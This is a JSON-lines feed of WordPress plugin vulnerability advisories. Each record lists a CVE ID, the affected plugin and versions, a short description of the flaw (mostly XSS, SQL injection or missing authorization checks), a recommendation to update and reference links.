{"CVE_ID":"CVE-2024-12506","slug":"nacc-wordpress-plugin","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The NACC WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'nacc' shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nacc-wordpress-plugin\\\/tags\\\/4.1.0\\\/nacc-wordpress-plugin.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d992b9dd-dfd1-497c-b09f-cca02dc87e34?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d992b9dd-dfd1-497c-b09f-cca02dc87e34?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11367","slug":"smoove-elementor","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smoove-elementor\\\/tags\\\/3.0.3\\\/inc\\\/modules\\\/api-logs-table.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smoove-elementor\\\/tags\\\/3.0.3\\\/inc\\\/modules\\\/api-logs-table.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8129bc3a-41c9-4a1e-8e04-55e23bb8d46d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3951","slug":"wp-optimize","versionImpact":"4.1.1","versionEndExcluding":"4.2.0","description":"The WP-Optimize  WordPress plugin before 4.2.0 does not properly escape user input when checking image compression statuses, which could allow users with the administrator role to conduct SQL Injection attacks in the context of Multi-Site WordPress configurations.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/220c195f-3df3-4883-8e0b-a0cf019e6323\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0554","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.1.25","versionEndExcluding":"4.2.0","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Feed Name value in version <= 4.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3217075%40podlove-podcasting-plugin-for-wordpress&new=3217075%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3217075%40podlove-podcasting-plugin-for-wordpress&new=3217075%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39d41772-49f3-4bce-a170-cbe64ba99184?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39d41772-49f3-4bce-a170-cbe64ba99184?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6630","slug":"contact-form-7-dynamic-text-extension","versionImpact":"4.1.0","versionEndExcluding":"4.2.0","description":"The Contact Form 7 \u2013 Dynamic Text Extension plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.1.0 via the CF7_get_custom_field and CF7_get_current_user shortcodes due to missing validation on a user controlled key. This makes it possible for authenticated attackers with contributor access or higher to access arbitrary metadata of any post type, referencing the post by id and the meta by key.","recommendation":"Update to version 4.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3f1d836-da32-414f-9f2b-d485c44b2486?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3f1d836-da32-414f-9f2b-d485c44b2486?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3019572%40contact-form-7-dynamic-text-extension%2Ftrunk&old=2968460%40contact-form-7-dynamic-text-extension%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3019572%40contact-form-7-dynamic-text-extension%2Ftrunk&old=2968460%40contact-form-7-dynamic-text-extension%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3170","slug":"td-composer","versionEndExcluding":"4.2","description":"The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not validate and escape some settings, which could allow users with Admin privileges to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95ff3c6-283b-4e5e-bea0-1f1375da08da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95ff3c6-283b-4e5e-bea0-1f1375da08da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3169","slug":"td-composer","versionEndExcluding":"4.2","description":"The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6d8216d-ace4-48ba-afca-74da0dc5abb5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6d8216d-ace4-48ba-afca-74da0dc5abb5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1337","slug":"skt-builder","versionImpact":"4.1","versionEndExcluding":"4.2","description":"The SKT Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveSktbuilderPageData' function in all versions up to, and including, 4.1. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary content into pages.","recommendation":"Update to version 4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034383\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034383\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4751","slug":"word-balloon","versionEndExcluding":"4.19.3","description":"The Word Balloon WordPress plugin before 4.19.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd5cc04a-042d-402a-ab7a-96aff3d57478\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd5cc04a-042d-402a-ab7a-96aff3d57478\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-48333","slug":"wp-fsqm-pro","versionEndExcluding":"4.19.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPQuark eForm - WordPress Form Builder allows Reflected XSS. This issue affects eForm - WordPress Form Builder: from n\/a through n\/a.","recommendation":"Update to version 4.19.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-fsqm-pro\\\/vulnerability\\\/wordpress-eform-wordpress-form-builder-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-fsqm-pro\\\/vulnerability\\\/wordpress-eform-wordpress-form-builder-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1294","slug":"wp-fsqm-pro","versionImpact":"4.18.0","versionEndExcluding":"4.19","description":"The eForm - WordPress Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.18.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eform-wordpress-form-builder\\\/3180835\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eform-wordpress-form-builder\\\/3180835\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/eform.live\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/eform.live\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c5db375-e865-47ba-a3dd-462c55d066fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6c5db375-e865-47ba-a3dd-462c55d066fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0285","slug":"real-media-library-lite","versionEndExcluding":"4.18.29","description":"The Real Media Library WordPress plugin before 4.18.29 does not sanitise and escape the created folder names, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adf09e29-baf5-4426-a281-6763c107d348\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adf09e29-baf5-4426-a281-6763c107d348\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4683","slug":"mstore-api","versionImpact":"4.17.5","versionEndExcluding":"4.17.6","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the create_blog function in all versions up to, and including, 4.17.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new posts.","recommendation":"Update to version 4.17.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.17.5\\\/controllers\\\/helpers\\\/blog-helper.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293669\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293669\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335bd15-7af7-4d8b-ad01-b1d9e76beb53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335bd15-7af7-4d8b-ad01-b1d9e76beb53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3438","slug":"mstore-api","versionImpact":"4.17.4","versionEndExcluding":"4.17.5","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to limited privilege escalation in all versions up to, and including, 4.17.4. This is due to a lack of restriction of role when registering. This makes it possible for unauthenticated attackers to to register with the 'wcfm_vendor' role, which is a Store Vendor role in the WCFM Marketplace \u2013 Multivendor Marketplace for WooCommerce plugin for WordPress. The vulnerability can only be exploited if the WCFM Marketplace \u2013 Multivendor Marketplace for WooCommerce plugin is installed and activated. The vulnerability was partially patched in version 4.17.3.","recommendation":"Update to version 4.17.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/controllers\\\/flutter-user.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277790\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3277790\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279132\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279132\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5d86ad-f94b-4fcb-9b74-ecddde2bf29d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be5d86ad-f94b-4fcb-9b74-ecddde2bf29d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8678","slug":"revolut-gateway-for-woocommerce","versionImpact":"4.17.3","versionEndExcluding":"4.17.4","description":"The Revolut Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \/wc\/v3\/revolut REST API endpoint in all versions up to, and including, 4.17.3. This makes it possible for unauthenticated attackers to mark orders as completed.","recommendation":"Update to version 4.17.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74dad6f0-0760-4420-b8cc-dc84cafd9b0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74dad6f0-0760-4420-b8cc-dc84cafd9b0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153063\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153063\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8878","slug":"wp-user-avatar","versionImpact":"4.16.4","versionEndExcluding":"4.16.5","description":"The The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content \u2013 ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 4.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Classes\\\/RegistrationAuth.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/Classes\\\/RegistrationAuth.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L329\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L339\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L339\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-avatar\\\/trunk\\\/src\\\/ShortcodeParser\\\/Builder\\\/FrontendProfileBuilder.php#L385\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345295\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3345295\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9309b8bf-f581-4a56-a1ed-3941ebb36127?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9309b8bf-f581-4a56-a1ed-3941ebb36127?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12042","slug":"mstore-api","versionImpact":"4.16.4","versionEndExcluding":"4.16.5","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the profile picture upload functionality in all versions up to, and including, 4.16.4 due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload HTML files with arbitrary web scripts that will execute whenever a user accesses the file.","recommendation":"Update to version 4.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/functions\\\/index.php#790\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/functions\\\/index.php#790\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205338\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205338\\\/mstore-api\\\/trunk\\\/functions\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af468138-c10a-4f9b-b714-0425d52f0210?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af468138-c10a-4f9b-b714-0425d52f0210?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1624","slug":"gdpr-cookie-compliance","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f4a402a-97f6-4638-9ce0-456ccd5606e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f4a402a-97f6-4638-9ce0-456ccd5606e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1623","slug":"gdpr-cookie-compliance","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40288fa0-50c6-4e13-9b92-968b060d3bf5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40288fa0-50c6-4e13-9b92-968b060d3bf5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2861","slug":"wp-user-avatar","versionImpact":"4.15.8","versionEndExcluding":"4.15.9","description":"The ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ProfilePress User Panel widget in all versions up to, and including, 4.15.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.15.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487731cd-da5a-45b6-8f39-4ae6420dd252?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487731cd-da5a-45b6-8f39-4ae6420dd252?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090831\\\/wp-user-avatar\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090831\\\/wp-user-avatar\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11179","slug":"mstore-api","versionImpact":"4.15.7","versionEndExcluding":"4.15.8","description":"The MStore API \u2013 Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to SQL Injection via the 'status_type' parameter in all versions up to, and including, 4.15.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.15.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b308bddf-a153-4d5b-936f-2170a1a494a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b308bddf-a153-4d5b-936f-2170a1a494a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.5\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php#L803\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/4.15.5\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php#L803\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190678\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3190678\\\/mstore-api\\\/trunk\\\/controllers\\\/helpers\\\/vendor-admin-wcfm-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1622","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7a903d61-2792-4fe0-a26b-f400f4a3124b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1621","slug":"gdpr-cookie-compliance","versionImpact":"4.15.6","versionEndExcluding":"4.15.7","description":"The GDPR Cookie Compliance  WordPress plugin before 4.15.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.15.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c30b9631-2024-4081-9cc5-8294a77c5ebb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c30b9631-2024-4081-9cc5-8294a77c5ebb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
